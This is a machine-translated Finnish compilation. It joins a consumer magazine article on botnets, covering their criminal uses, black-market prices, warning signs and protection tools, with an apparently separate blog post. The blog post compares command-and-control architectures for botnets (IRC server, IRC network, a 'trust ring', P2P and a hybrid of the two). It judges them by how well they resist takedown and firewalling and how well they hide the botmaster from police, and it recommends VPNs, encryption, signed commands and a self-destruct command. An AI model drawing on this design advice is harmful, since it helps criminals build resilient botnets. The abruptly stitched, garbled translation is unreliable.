Bottiverkot. Luomme oman taistelubotnet-verkkomme. Onko tietokoneessani botti

Nykyään botneteistä on tullut yksi kyberrikollisten tärkeimmistä työkaluista. ComputerBild kertoo, mitä bottiverkot ovat, miten ne toimivat ja kuinka voit säästää tietokonettasi joutumasta zombiverkkoon.

Bottiverkko eli zombieverkko on haittaohjelmien saastuttamien tietokoneiden verkko, jonka avulla hyökkääjät voivat etäohjata toisten koneita omistajiensa tietämättä. Viime vuosina zombieverkoista on tullut vakaa tulonlähde kyberrikollisille. Jatkuvasti alhaiset kustannukset ja botnettien hallintaan vaadittava vähimmäisosaaminen lisäävät suosiota ja siten myös botnet-verkkojen määrää. Zombiverkkojen avulla toteutetut DDoS-hyökkäykset tai roskapostiviestit, hyökkääjät ja heidän asiakkaat ansaitsevat tuhansia dollareita.

Onko tietokoneessani botti?

Tähän kysymykseen ei ole helppoa vastata. Tosiasia on, että on lähes mahdotonta seurata robottien puuttumista tietokoneen päivittäiseen toimintaan, koska se ei vaikuta järjestelmän suorituskykyyn millään tavalla. On kuitenkin useita merkkejä, joiden avulla voit määrittää, että järjestelmässä on botti:

Tuntemattomat ohjelmat yrittävät muodostaa yhteyden Internetiin, mistä palomuuri tai virustorjuntaohjelmisto raportoi ajoittain suuttuneena;

Internet-liikenne kasvaa erittäin suureksi, vaikka käytät Internetiä erittäin maltillisesti;

Käynnissä olevien järjestelmäprosessien luetteloon ilmestyy uusia, jotka naamioituvat tavallisiksi Windows-prosesseiksi (esimerkiksi bottia voidaan kutsua scvhost.exe - tämä nimi on hyvin samanlainen kuin Windows-järjestelmäprosessin nimi svchost.exe; se on melko vaikeaa huomaamaan eron, mutta se on mahdollista).

Miksi botnettejä luodaan?

Bottiverkkoja luodaan rahan ansaitsemiseksi. Zombiverkkojen kaupallisesti kannattavassa käytössä on useita alueita: DDoS-hyökkäykset, luottamuksellisten tietojen kerääminen, roskapostin lähettäminen, tietojenkalastelu, hakukoneroskaposti, napsautuslaskurien huijaaminen jne. On huomattava, että mikä tahansa suunta on kannattava riippumatta siitä, minkä hyökkääjän valitsee , ja Bottiverkko mahdollistaa kaikkien näiden toimintojen suorittamisen samanaikaisesti.

DDoS-hyökkäys (englanniksi Distributed Denial-of-Service) on hyökkäys tietokonejärjestelmään, kuten verkkosivustoon, jonka tarkoituksena on saattaa järjestelmä "pudotukseen" eli tilaan, jossa se voi ei enää vastaanota ja käsittele laillisten käyttäjien pyyntöjä. Yksi yleisimmistä tavoista suorittaa DDoS-hyökkäys on lähettää useita pyyntöjä uhrin tietokoneelle tai sivustolle, mikä johtaa palvelunestoon, jos hyökkäyksen kohteena olevan tietokoneen resurssit eivät riitä kaikkien saapuvien pyyntöjen käsittelemiseen. DDoS-hyökkäykset ovat valtava ase hakkereille, ja botnet on täydellinen työkalu niiden toteuttamiseen.

DDoS-hyökkäykset voivat olla sekä epäreilun kilpailun keino että kyberterrorismi. Bottiverkon omistaja voi tarjota palvelun kenelle tahansa yrittäjälle, joka ei ole liian tunnollinen - suorittaa DDoS-hyökkäyksen kilpailijansa verkkosivustolle. Hyökkätty resurssi "putoaa" tällaisen kuormituksen jälkeen, hyökkäyksen asiakas saa tilapäisen edun ja kyberrikollinen saa vaatimattoman (tai ei niin) palkinnon.

Samalla tavalla bottiverkkojen omistajat voivat itse käyttää DDoS-hyökkäyksiä kiristääkseen rahaa suurilta yrityksiltä. Samaan aikaan yritykset noudattavat mieluummin kyberrikollisten vaatimuksia, koska onnistuneiden DDoS-hyökkäysten seurausten eliminointi on erittäin kallista. Esimerkiksi tammikuussa 2009 GoDaddy.com, yksi suurimmista isännistä, joutui DDoS-hyökkäyksen kohteeksi, jonka seurauksena tuhannet sen palvelimilla isännöidyt sivustot olivat poissa käytöstä lähes vuorokauden ajan. Majoittajan taloudelliset tappiot olivat valtavat.

Helmikuussa 2007 juuri DNS-palvelimiin tehtiin sarja hyökkäyksiä, joiden toiminta vaikuttaa suoraan koko Internetin normaaliin toimintaan. On epätodennäköistä, että näiden hyökkäysten tarkoitus olisi ollut World Wide Webin romahtaminen, koska zombieverkkojen olemassaolo on mahdollista vain, jos Internet on olemassa ja toimii normaalisti. Ennen kaikkea se oli kuin osoitus zombiverkkojen tehosta ja kyvyistä.

DDoS-hyökkäysten toteuttamiseen tarkoitettujen palveluiden mainontaa julkaistaan ​​avoimesti monilla aiheeseen liittyvillä foorumeilla. Hyökkäysten hinnat vaihtelevat 50:stä useisiin tuhansiin dollareihin DDoS-bottiverkon jatkuvan toiminnan päivältä. Sivuston www.shadowserver.org mukaan vuonna 2008 tapahtui noin 190 000 DDoS-hyökkäystä, joista kyberrikolliset saivat ansaita noin 20 miljoonaa dollaria. Tämä summa ei luonnollisesti sisällä kiristyksen tuloja, joita on yksinkertaisesti mahdotonta laskea.

Luottamuksellisten tietojen kerääminen

Käyttäjien tietokoneille tallennetut luottamukselliset tiedot houkuttelevat aina tunkeilijoita. Eniten kiinnostavia ovat luottokorttien numerot, taloustiedot ja eri palvelujen salasanat: postilaatikot, FTP-palvelimet, pikaviestit jne. Samaan aikaan nykyaikaiset haittaohjelmat antavat hyökkääjille mahdollisuuden valita juuri ne tiedot, joista he ovat kiinnostuneita - lataa ne vain PC:lle vastaavaan moduuliin.

Hyökkääjät voivat joko myydä varastetut tiedot tai käyttää niitä hyödykseen. Internetin lukuisilla foorumeilla ilmestyy päivittäin satoja pankkitilien myyntiilmoituksia. Tilin hinta riippuu käyttäjän tilillä olevasta rahamäärästä ja vaihtelee 1 dollarista 1 500 dollariin tiliä kohden. Alaraja osoittaa, että kilpailun aikana tällaista liiketoimintaa harjoittavat kyberrikolliset pakotetaan alentamaan hintoja. Tienatakseen todella paljon rahaa, he tarvitsevat tasaisen tuoreen datan, ja tämä edellyttää zombiverkkojen tasaista kasvua. Korttelijat ovat erityisen kiinnostuneita taloustiedoista – pankkikorttien väärentämiseen osallistuvista tunkeilijoista.

Tällaisten toimintojen kannattavuuden voidaan arvioida kaksi vuotta sitten pidätetyn brasilialaisen kyberrikollisten ryhmän tunnetun tarinan perusteella. He pystyivät nostamaan 4,74 miljoonaa dollaria tavallisten käyttäjien pankkitileiltä käyttämällä tietokoneilta varastettuja tietoja. Rikolliset, jotka harjoittavat asiakirjojen väärentämistä, väärennettyjen pankkitilien avaamista, laittomien liiketoimien tekemistä jne., ovat myös kiinnostuneita hankkimaan sellaisia ​​henkilötietoja, jotka eivät liity suoraan käyttäjän rahoihin.

Toinen botnettien keräämä tieto on sähköpostiosoitteet, ja toisin kuin luottokorttinumerot ja tilinumerot, useita sähköpostiosoitteita voidaan poimia yksittäisen tartunnan saaneen tietokoneen osoitekirjasta. Kerätyt osoitteet laitetaan myyntiin ja joskus "painon mukaan" - megatavua kohden. Tällaisen "tuotteen" pääasialliset ostajat ovat roskapostittajat. Miljoonan sähköpostiosoitteen lista maksaa 20–100 dollaria ja roskapostittajille samaan miljoonaan osoitteeseen tilattu postitus 150–200 dollaria. Hyöty on ilmeinen.

Rikollisia kiinnostavat myös erilaisten maksullisten palveluiden tilit ja verkkokaupat. Ne ovat varmasti halvempia kuin pankkitilit, mutta niiden toteuttamiseen liittyy pienempi riski lainvalvontaviranomaisten häirinnästä.

Miljoonia roskapostiviestejä kiertää ympäri maailmaa joka päivä. Ei-toivotun postin lähettäminen on yksi nykyaikaisten botnettien päätehtävistä. Kaspersky Labin mukaan noin 80 % kaikesta roskapostista lähetetään zombiverkkojen kautta. Lainkuuliaisten käyttäjien tietokoneilta lähetetään miljardeja kirjeitä, joissa on Viagra-mainoksia, kopioita kalliista kelloista, nettikasinoista jne., jotka tukkivat viestintäkanavia ja postilaatikoita. Tällä tavalla hakkerit vaarantavat viattomien käyttäjien tietokoneet: osoitteet, joista postia lähetetään, ovat virustentorjuntayhtiöiden mustalla listalla.

Viime vuosina roskapostipalvelujen kattavuus on laajentunut: ICQ-roskapostia, roskapostia sosiaalisissa verkostoissa, foorumeilla ja blogeissa on ilmestynyt. Ja tämä on myös botnetin omistajien "ansio": loppujen lopuksi ei ole vaikeaa lisätä bot-asiakkaaseen lisämoduulia, joka avaa näköaloja uudelle yritykselle iskulauseilla, kuten "Spam on Facebook". Halpa." Roskapostin hinnat vaihtelevat kohdeyleisön ja lähetettyjen osoitteiden määrän mukaan. Kohdennettujen postitusten hintahaarukka on 70 dollarista satojen tuhansien osoitteiden osalta 1 000 dollariin useiden kymmenien miljoonien osoitteiden osalta. Viime vuoden aikana roskapostittajat ovat ansainneet noin 780 miljoonaa dollaria lähettämällä sähköpostia.

Luo haun roskapostia

Toinen vaihtoehto bottiverkkojen käyttämiselle on lisätä sivustojen suosiota hakukoneissa. Työskennellessään hakukoneoptimoinnissa resurssien ylläpitäjät yrittävät nostaa sivuston asemaa hakutuloksissa, koska mitä korkeampi se on, sitä enemmän kävijöitä tulee sivustolle hakukoneiden kautta ja sitä enemmän tuloja sivuston omistaja saa. saada esimerkiksi verkkosivujen mainostilan myynnistä. Monet yritykset maksavat webmastereille paljon rahaa tuodakseen sivuston ensimmäiselle sijalle "hakukoneissa". Bottiverkkojen omistajat ovat vakoilleet joitain temppujaan ja automatisoivat hakukoneoptimoinnin.

Kun näet LiveJournalissa tekemäsi kommenteissa tai valokuvapalveluun lähetetyn onnistuneen valokuvan, paljon sinulle tuntemattoman henkilön ja joskus "ystäväsi" luomia linkkejä - älä ylläty: joku tilasi juuri resurssinsa mainostaminen omistajien bottiverkoille. Erityisesti luotu ohjelma ladataan zombie-tietokoneeseen ja jättää omistajansa puolesta kommentteja suosittuihin resursseihin linkeillä mainostettavalle sivustolle. Laittomien hakuroskapostipalvelujen keskihinta on noin 300 dollaria kuukaudessa.

Kuinka paljon henkilötiedot maksavat

Varastettujen henkilötietojen hinta riippuu suoraan maasta, jossa niiden laillinen omistaja asuu. Esimerkiksi Yhdysvaltain asukkaan täydelliset tiedot maksavat 5-8 dollaria. Mustalla markkinoilla arvostetaan erityisesti Euroopan unionin asukkaiden tietoja - se on kaksi tai kolme kertaa kalliimpaa kuin Yhdysvaltojen ja Kanadan kansalaisten tiedot. Tämä selittyy sillä, että rikolliset voivat käyttää tällaisia ​​tietoja missä tahansa EU:hun kuuluvassa maassa. Keskimäärin yhden henkilön kokonaisen datapaketin hinta ympäri maailmaa on noin 7 dollaria.

Valitettavasti henkilölle, joka on päättänyt järjestää botnetin tyhjästä, ei ole vaikeaa löytää Internetistä ohjeita zombie-verkon luomiseen. Ensimmäinen askel: luo uusi zombieverkko. Tätä varten sinun on saastutettava käyttäjien tietokoneet erityisellä ohjelmalla - botilla. Roskapostiviestejä, viestien lähettämistä foorumeille ja sosiaalisiin verkostoihin ja muita menetelmiä käytetään tartuttamiseen; Usein botilla on itselisäystoiminto, kuten virukset tai madot.

Jotta mahdollinen uhri pakotetaan asentamaan botti, käytetään sosiaalisen suunnittelun tekniikoita. Esimerkiksi he tarjoavat katsoa mielenkiintoista videota, joka vaatii erityisen koodekin lataamisen. Tällaisen tiedoston lataamisen ja suorittamisen jälkeen käyttäjä ei tietenkään voi katsoa mitään videota eikä todennäköisesti huomaa mitään muutoksia, ja hänen tietokoneensa saa tartunnan ja siitä tulee nöyrä palvelija, joka suorittaa kaikki komennot botnet-mestari.

Toinen laajalti käytetty bot-tartuntatapa on ajolataus. Kun käyttäjä vierailee tartunnan saaneella verkkosivulla, haitallista koodia ladataan hänen tietokoneelleen sovellusten eri "aukkojen" kautta - pääasiassa suosituissa selaimissa. Heikkokohtien hyödyntämiseen käytetään erityisiä ohjelmia - hyväksikäyttöä. Niiden avulla ei voi vain ladata hiljaa, vaan myös käynnistää viruksen tai botin äänettömästi. Tämäntyyppinen haittaohjelmien jakelu on vaarallisin, koska jos suosittu resurssi hakkeroidaan, kymmenet tuhannet käyttäjät saavat tartunnan!

Botille voidaan antaa itselisäystoiminto tietokoneverkkojen kautta. Se voi levitä esimerkiksi saastuttamalla kaikki käytettävissä olevat suoritettavat tiedostot tai etsimällä ja saastuttamalla haavoittuvia verkon tietokoneita.

Bottiverkon luoja voi hallita pahaa aavistamattomien käyttäjien tartunnan saaneita tietokoneita robottiverkon komentokeskuksen avulla, ottamalla bottiin yhteyttä IRC-kanavan, verkkoyhteyden tai millä tahansa muulla käytettävissä olevalla tavalla. Riittää, kun useita kymmeniä koneita yhdistetään verkkoon, jotta botnet alkaa tuottaa tuloja omistajalleen. Lisäksi tämä tulo on lineaarisesti riippuvainen zombieverkoston vakaudesta ja sen kasvunopeudesta.

Mainosyritykset, jotka toimivat verkossa PPC (Pay-per-Click) -järjestelmän mukaisesti, maksavat rahaa Internetissä julkaistujen mainosten linkkien yksittäisistä napsautuksista. Bottiverkkojen omistajille tällaisten yritysten pettäminen on tuottoisaa liiketoimintaa. Otetaan esimerkkinä tunnettu Google AdSense -verkosto. Siinä mukana olevat mainostajat maksavat Googlelle sijoitettujen mainosten napsautuksista siinä toivossa, että "valoon" katsonut käyttäjä ostaa heiltä jotain.

Google puolestaan ​​sijoittaa kontekstuaalista mainontaa useille AdSense-ohjelmaan osallistuville sivustoille ja maksaa sivuston omistajalle prosenttiosuuden jokaisesta napsautuksesta. Valitettavasti kaikki sivustojen omistajat eivät ole rehellisiä. Zombie-verkon avulla hakkeri voi tuottaa tuhansia ainutlaatuisia napsautuksia päivässä, yhden kustakin koneesta, ilman, että se herättää Googlen epäilyksiä. Siten mainoskampanjaan käytetyt rahat virtaavat hakkerin taskuun. Valitettavasti ei ole vielä ollut yhtään tapausta, jossa joku olisi joutunut vastuuseen sellaisista teoista. Click Forensicsin mukaan vuonna 2008 noin 16-17 % kaikista mainoslinkkien napsautuksista oli väärennettyjä, joista vähintään kolmasosa oli bottiverkkojen tuottamia. Tekemällä joitain yksinkertaisia ​​laskelmia voit ymmärtää, että viime vuonna bottiverkkojen omistajat "napsahtivat" 33 000 000 dollaria. Hyviä tuloja hiiren napsautuksista!

Hyökkääjien ja epärehellisten liikemiesten ei tarvitse luoda botnet-verkkoa tyhjästä yksin. He voivat ostaa tai vuokrata hakkereilta erikokoisia ja -tehoisia bottiverkkoja - esimerkiksi ottamalla yhteyttä erikoistuneisiin foorumeihin.

Valmiin bottiverkon hinta sekä sen vuokrauskustannukset riippuvat suoraan siihen sisältyvien tietokoneiden määrästä. Valmiit botnetit ovat suosituimpia englanninkielisillä foorumeilla.

Pienet bottiverkot, jotka koostuvat muutamasta sadasta robotista, maksavat 200–700 dollaria. Samaan aikaan yhden botin keskihinta on noin 50 senttiä. Suuremmat botnetit maksavat enemmän rahaa.

19-vuotiaan hollantilaisen hakkerin muutama vuosi sitten luomassa Shadow zombie -verkossa oli yli 100 000 tietokonetta ympäri maailmaa ja se myytiin 25 000 eurolla. Tällä rahalla voit ostaa pienen talon Espanjasta, mutta brasilialainen rikollinen osti mieluummin bottiverkon.

Bottiverkkojen suojaustyökalut

1. Ensinnäkin nämä ovat virustentorjuntaohjelmia ja kattavia paketteja suojaamaan Internet-uhkia vastaan ​​säännöllisesti päivitettävin tietokantoin. Ne auttavat paitsi havaitsemaan vaaran ajoissa, myös poistamaan sen ennen kuin zombiksi muuttunut uskollinen "rautaystäväsi" alkaa lähettää roskapostia tai "pudottaa" sivustoja. Kattavat paketit, kuten Kaspersky Internet Security 2009, sisältävät täydellisen joukon suojausominaisuuksia, joita voidaan hallita yhteisen komentokeskuksen kautta.

Viruksentorjuntamoduuli skannaa taustalla tärkeimmät järjestelmäalueet ja tarkkailee kaikkia mahdollisia virusten tunkeutumistapoja: sähköpostin liitteitä ja mahdollisesti vaarallisia verkkosivustoja.

Palomuuri valvoo tiedonsiirtoa henkilökohtaisen tietokoneen ja Internetin välillä. Se tarkastaa kaikki Webistä vastaanotetut tai sinne lähetetyt datapaketit ja tarvittaessa estää verkkohyökkäykset ja estää yksityisten tietojen salaa lähettämisen Internetiin.

Roskapostisuodatin suojaa postilaatikkoasi mainosviesteiltä. Sen tehtäviin kuuluu myös phishing-sähköpostien havaitseminen, jonka avulla hyökkääjät yrittävät poimia käyttäjältä tietoja hänen tiedoistaan ​​verkkomaksu- tai pankkijärjestelmiin kirjautumista varten.

2. Käyttöjärjestelmän, verkkoselaimien ja muiden sovellusten säännölliset päivitykset, joiden kehittäjät löytävät ja poistavat monia suojausaukkoja sekä hyökkääjien käyttämiä heikkouksia.

3. Erityiset salausohjelmat suojaavat henkilötietojasi, vaikka botti olisi jo tunkeutunut tietokoneeseen, koska päästäkseen niihin sen täytyy murtaa salasana.

4. Maalaisjärkeä ja varovaisuutta. Jos haluat suojata tietosi erilaisilta uhkilta, sinun ei tule ladata ja asentaa tuntemattoman alkuperän ohjelmia, avata arkistoja, joissa on virustorjuntavaroitusten vastaisia ​​tiedostoja, vierailla selaimen vaarallisiksi merkitsemillä sivustoilla jne.

Kiitämme Kaspersky Labia avusta materiaalin valmistelussa

Ei ihme, että julkaisin luonnoksen muistiinpanostani vertaisverkkoista. Lukijoiden kommenteista on ollut paljon apua. He inspiroivat minua jatkamaan tämänsuuntaista työtä. Mitä siitä tuli - katso leikkauksen alle.

Kuten postauksen otsikosta näkyy, puhumme tänään vain botnet-verkoista. Unohdetaan hetkeksi tiedostojen jakaminen, välityspalvelinverkot, vertaisblogit ja p2p-valuutta.

Sanaa "botnet" ei pidä ymmärtää laittomana. Kun käyttäjä vapaaehtoisesti lataa ja asentaa "botin" lahjoittaakseen liikenne- ja laskentaresurssinsa tieteelliseen projektiin, tämä on myös bottiverkko. Näin ollen botmaster ei välttämättä ole rikollinen. Tiedeprojektissa työskentelevä 30 tutkijan ryhmä on myös "botmaster".

1. Bottiverkon ohjaus palvelimen kautta

Helpoin tapa hallita botteja on käyttää irc/http-palvelinta. Sen kautta robotit saavat komentoja ja lähettävät sen avulla suorituksensa tuloksen.

Piirrän parhaani mukaan :) Tässä tapauksessa kuvitusta ei ehkä tarvita, mutta päätin valmistaa sinut shokkiin, jonka muut piirustukset tuottavat.

  • Hyvin yksinkertainen toteutus, varsinkin IRC:n tapauksessa.
  • Nopea botin vastaus.
  • Voit antaa komentoja sekä koko verkolle että tietylle botille.
  • Jos verkko koostuu sadoista solmuista, yksi kanava DalNetissä riittää hallitsemaan sitä. Suuremmissa verkoissa voit hankkia edullisen (noin 300 ruplaa / kk) webhotellin.
  • HTTP:n tapauksessa-palvelin yksinkertaistaa huomattavasti kauniin käyttöliittymän kehittämistä. Tämä on tärkeää, jos käytämme botnetiä jossain verkkopalvelussa.
  • Palvelimen kuormitus. Suurimpien robottiverkkojen solmujen määrä mitataan miljoonissa. Tällaisen joukon hallitsemiseen yksi palvelin ei riitä.
  • Jos palvelimelle tapahtuu jotain (verkkovika, DDoS, tulipalo palvelinkeskuksessa), verkko katkeaa.
  • Yksi palvelin on helppo palomuuri. Tämän voivat tehdä sekä palveluntarjoaja että Kaspersky Lab -tuotteet käyttäjän tietokoneella.
  • Botmaster on suhteellisen helppo löytää. Kerran unohdin VPN:n - odota vieraita univormussa.
  • IRC:n tapauksessa, vain robotit vastaanottavat komennot verkossa. Jos botti tulee kanavalle kaksi minuuttia komennon lähettämisen jälkeen, se on "off topic".
  • Bottien lukumäärä ja niiden IP voidaan määrittää siirtymällä IRC-kanavalle. Kanavan suojaaminen salasanalla ei auta, koska jälkimmäinen on helppo poimia bottikoodista.

2. Ohjaus IRC-verkon kautta

Looginen askel edellisen menetelmän haittojen ratkaisemiseksi on tehdä yhden palvelimen sijasta useita. Mielestäni helpoin tapa tehdä tämä on rakentaa oma IRC-verkko. Tässä tapauksessa koko vastuu tiedonsiirrosta palvelimien välillä kuuluu IRC-protokollalle. Botin puolella ei ole eroa edelliseen ratkaisuun verrattuna.

  • Yksinkertainen toteutus, vaikka joudutkin näppärästi palvelinten asettamisen kanssa.
  • Botit vastaavat silti nopeasti komentoihin.
  • On edelleen mahdollista antaa komentoja tietylle botille.
  • Kuormituksen tasapainotus palvelimien välillä, suojaus DDoS:ää ja ylivoimaista estettä vastaan. Kymmeniä hyvää palvelinta voi riittää miljoonan botin verkkoon.
  • Jos osa palvelimista epäonnistuu, sinulla on aikaa vaihtaa ne.
  • Jos käytät IRC:tä ja hämmentää tuhat bottia, jotka istuvat yhdellä kanavalla, käytä useita kanavia. Vastaavasti voit antaa verkon eri osille erilaisia ​​tehtäviä.
  • Sinun täytyy etsiä palvelimia / VDS.
  • Voit palomuuria kaikki palvelimet samanaikaisesti, eikä botmaster ehdi korvaamaan niitä.
  • Botmaster on edelleen melko helppo jäljittää.
  • IRC:n tapauksessa, robottien määrä ja niiden IP-osoitteet ovat edelleen näkyvissä.
  • Kanavalle juuri liittyneet robotit eivät liity aiheeseen.

Termin trastring (luottamusrengas, ympyrä / luottamusrengas) kuulin ensimmäisen kerran toveri Nickolasilta edellisen postauksen kommenteissa. Puhumme "palvelinten" toiminnan uskomisesta osalle bottiverkkoa.

  • Palvelimia ei tarvita.
  • Trastring voi koostua sadoista solmuista. Niin monen irc/http-palvelimen nostaminen ja hallinta ei ole helppoa.
  • Botit eivät aina saa pitää yhteyttä trastringiin. Riittää, kun tarkistat 5-10 minuutin välein, onko uusia komentoja. Jokaisella komennolla on oltava TTL, jota varten se on tallennettu trastringiin.
  • Suuri määrä "palvelimia" tarjoaa verkon joustavuuden kaikenlaisia ​​katastrofeja vastaan. Kun osa renkaasta kuolee, botmaster voi antaa komennon luoda uusi trastring. Tai renkaan solmut voivat tehdä sen itse (tarvitaan digitaaliset allekirjoitukset ja hyväksyntä tietylle prosenttiosuudelle trastringistä).
  • Olkoon trastring koostuva 512 solmusta, joista vähintään 50% on jatkuvasti verkossa. Jos verkossa on 1 000 000 bottia ja jokainen niistä on jatkuvasti online-tilassa, yhtä trastring-solmua kohden on alle 4 000 bottia. Kun botti pyytää komentoja (tai lähettää tuloksen) 10 minuutin välein, kukin rengassolmu käsittelee samanaikaisesti keskimäärin 7 yhteyttä. Melko vähän tämän kokoiselle verkolle, eikö?
  • Tarkan luettelon kaikista boteista voi saada vain botmaster.
  • Voit antaa komentoja tietylle botille tai robottiryhmälle.
  • Botit reagoivat nopeasti komentoihin.
  • Botmasteria on vaikea löytää.

Ainoa negatiivinen asia, jonka näen, on toteutuksen monimutkaisuus.

4. Vertaisverkot

Internet-lähteiden mukaan P2P-bottiverkot ovat tällä hetkellä erittäin suosittuja. Näistä lähteistä eniten huomiota ansaitsee. Jokainen solmu tällaisessa verkossa tuntee vain muutaman "naapurisolmun". Botmaster lähettää komennot useille verkkosolmuille, minkä jälkeen ne välitetään naapurilta naapurille.

Naapuriluettelo annetaan boteille kerran erityisellä palvelimella. Se voi olla esimerkiksi hakkeroitu sivusto. Palvelin ei tee muuta, sitä tarvitaan vain lisättäessä solmuja bottiverkkoon.

  • Toteutus on hieman yksinkertaisempi kuin edellisessä kappaleessa.
  • Minimikuormitus kaikissa verkon solmuissa. Bottiverkon koko on käytännössä rajoittamaton.
  • Kestää DDoS:ää, solmujen sammutuksia jne. P2p-botnetin palomuuri on lähes mahdotonta.
  • Ei pysyviä yhteyksiä, kuten IRC:n tapauksessa.
  • Tarvitsemme palvelimen, vaikkakaan ei kauaa.
  • Solmut sammuvat ajoittain, mikä vaikuttaa verkon liitettävyyteen.
  • Jos haluat esimerkiksi saada luettelon kaikista boteista, sinun on ohjeistettava niitä käyttämään tiettyä sivustoa. Tässä tapauksessa ei ole takeita siitä, että vain botmaster saa luettelon.
  • Jos haluat antaa komennon tietylle solmulle, sinun on joko lähetettävä se koko verkkoon tai muodostettava yhteys suoraan solmuun.
  • Botit reagoivat hitaasti komentoihin.
  • Jos haluat lähettää "pitkän" komennon esimerkiksi URL-osoitteiden luettelon kanssa, sinun on käytettävä kolmannen osapuolen palvelinta, muuten botien reaktio hidastuu entisestään.
  • Botmasterin löytäminen on helpompaa kuin edellisessä esimerkissä, johtuen jonkinlaisen palvelimen käytöstä.

Voin tietysti olla väärässä, mutta mielestäni p2p-bottiverkot ovat paljon pahempia kuin trastring. Ehkä virustentorjuntaohjelmistojen valmistajat vaikenevat jostain?

5. Täydellinen ratkaisu

Yksi tapa keksiä jotain uutta ja hyvää on ylittää jotain vanhaa. Yhdistimme puhelimen, tietokoneen, nauhurin, kameran ja videokameran - saimme älypuhelimen. Et yllätä ketään tietokoneella ja ilmastointilaitteella autossa. Kiinnitä jääkaappimagneetti jokaiseen jogurttiin ja myynti nousee pilviin.

On tärkeää muistaa, että epäonnistuneen risteyksen tapauksessa voimme saada halvan yksilön. Kuulostaa geneettisiltä algoritmeilta, eikö? Otetaanpa näennäisesti hyvä idea - p2p-botnet, jossa trastring vastaa naapureiden osoittamisesta. Silloin emme tarvitse palvelinta!

Mutta tässä tapauksessa toteutuksen monimutkaisuus kasvaa, vaikkakaan ei paljon. Loput p2p-botnet-ongelmat jäävät ratkaisematta. Voitto on mitätön, tilanne on 1:1.

Istuttuani hetken paperin ja kynän kanssa synnytin seuraavan idean. Sikäli kuin tiedän, sitä ei ole koskaan aiemmin puhuttu, ja olen ensimmäinen, joka keksi tämän. HR plus 100.

Entä jos verkossa on kaksi tilaa - "aktiivinen" ja "passiivinen". Passiivisessa tilassa botnet toimii p2p-järjestelmän mukaisesti. Botmaster lähettää komennon "mobilize troops" ja verkko muuttuu trastringiksi. Komennossaan botmasterin on määritettävä jäljityssolmut ja aika, jolloin verkko muuttaa tilaa. Voit suurentaa sormusta ohjeistamalla useita botteja nimeämään naapurinsa. Lisäksi kaikki komennot lähetetään trastringin kautta. Hän on myös vastuussa "naapureiden" osoittamisesta uusille solmuille. Jos renkaan TTL myöhemmin osoittautuu riittämättömäksi, voidaan antaa "pidentää aktiivista tilaa" -komento.

Tällainen bottiverkko ei peri mitään p2p-verkon haitoista, ja sillä on kaikki trastringin edut sekä seuraavat:

  • Lisääntynyt vastustuskyky ddos-hyökkäyksille ja verkkosuodattimille, kuten p2p-verkko.
  • Botien vähimmäisresurssien kulutus verkon seisokkien aikana. Botmasterin ei tarvitse seurata trastringin tilaa ja valita sille uusia solmuja.
  • Trastringiä luotaessa valitaan vain ne solmut, jotka ovat tällä hetkellä online-tilassa. Botit muodostavat yhteyden renkaaseen ensimmäisellä yrittämällä (jonkin aikaa).
  • Luettelo "naapureista" päivitetään säännöllisesti. Väliaikaiseen renkaaseen sisältyvien solmujen IP-osoitteet ovat kuitenkin koko bottiverkon tiedossa. Joten anna heidän pitää näitä solmuja naapureina, jos jotkut todellisista naapureista eivät ole näkyneet verkossa pitkään aikaan.

Ja ainoa haittapuoli, jonka näen tässä, on toteutuksen monimutkaisuus. Mutta tämä ei todellakaan ole ongelma.

6. Mikä on tärkeää muistaa

Olen toistaiseksi vaikenenut joistakin seikoista, koska ne ovat luontaisia ​​mihin tahansa nimettyihin botnet-hallintamenetelmiin. Niihin kannattaa keskittyä.

  • Jotkut solmut eivät voi hyväksyä saapuvia yhteyksiä palomuurin tai NAT:n vuoksi. Tämä tulee ainakin ottaa huomioon robottia kirjoitettaessa. Esimerkiksi jakaessaan komentoja p2p-verkossa, botin on ajoittain otettava yhteyttä naapureihinsa eikä odotettava komentoja heiltä.
  • On oletettava, että kaikkia verkkoon lähetettyjä komentoja kuunnellaan. Kiinnostunut henkilö voi ainakin muokata bottikoodia näitä tarkoituksia varten. On kuitenkin järkevää salata kaikki verkossa välitettävä liikenne. Tämä ainakin vaikeuttaa bottiverkon analysointia.
  • Kaikki botmaster-komennot on allekirjoitettava digitaalisesti. Salasanat eivät ole hyviä, koska ne voidaan siepata.
  • Koska puhumme toteutuksesta, huomaan, että missä tahansa botnetissä on oltava vähintään kolme komentoa - päivitys botteja, päivittää botmaster-avain ja tuhota koko verkko.
  • Verkossa on "vakooja" solmuja. Jotkut niistä sisältyvät trastringiin. Samaan aikaan emme tiedä tavoitteita, joita nämä "vakoilijat" tavoittelevat - tämä voi olla botmasterin IP-osoitteen määrittäminen, komentojen suorittamisen häiriintyminen, verkon poistaminen käytöstä, botnet-verkon hallinnan saaminen ja niin edelleen. Tämä tarkoittaa erityisesti, että botien tulisi valita satunnainen solmu muodostaessaan yhteyden renkaaseen sen sijaan, että käyttäisivät samaa solmua jatkuvasti.
  • Kuvassa jäljityssolmut on kytketty toisiinsa, mutta paljon käytännöllisempää on toteuttaa rengas pienen p2p-verkon muodossa eli "naapurit"-periaatteen mukaisesti.

Huomaan myös, että ratkaisut 1 ja 2 (palvelin, monet palvelimet) menettävät monia miinuksia ja saavat pari plussaa ratkaisusta 3 (trastring) HTTP-protokollaa käytettäessä. Selaa näitä kappaleita uudelleen ymmärtääksesi mitä tarkoitan.

7. Päätelmät

Pienemmille verkoille hyvä ratkaisu on käyttää IRC:tä. Jos esimerkiksi haluat luoda oman pienen verkon hajautettua laskentaa varten, asenna botti kotitietokoneellesi, kannettavaan tietokoneeseen, netbookiin, työtietokoneellesi (jos yrityksen käytäntö sallii) ja hallitse verkkoa DalNetin kautta. Tarvittaessa verkko voidaan myöhemmin "pumpata" trastringiin. Annat oikean komennon, eikö niin?

Jos botnet tarvitsee kauniin verkkoliittymän, voi olla järkevää kirjoittaa lisäohjelma, joka ottaa komennot web-palvelimelta ja lähettää ne IRC:hen. Harkitse ainakin tätä lähestymistapaa.

Universaalit ratkaisut ovat trastring ja p2p+trastring. Tällaiset verkot toimivat ihanteellisesti riippumatta siitä, kuinka monta solmua niillä on, 1 tai 1 000 000, ilman palvelimia.

Johtuen "puhtaan p2p:n" ilmeisistä haitoista renkaaseen verrattuna, minulle jää epäselväksi, miksi sitä pidetään hyvänä ratkaisuna. Verkon muodostavilla roboteilla on varmasti monia hyödyllisiä ominaisuuksia. Mikset lisäisi trastringiin uutta pientä hyötykuormaa – verkon mobilisointia?

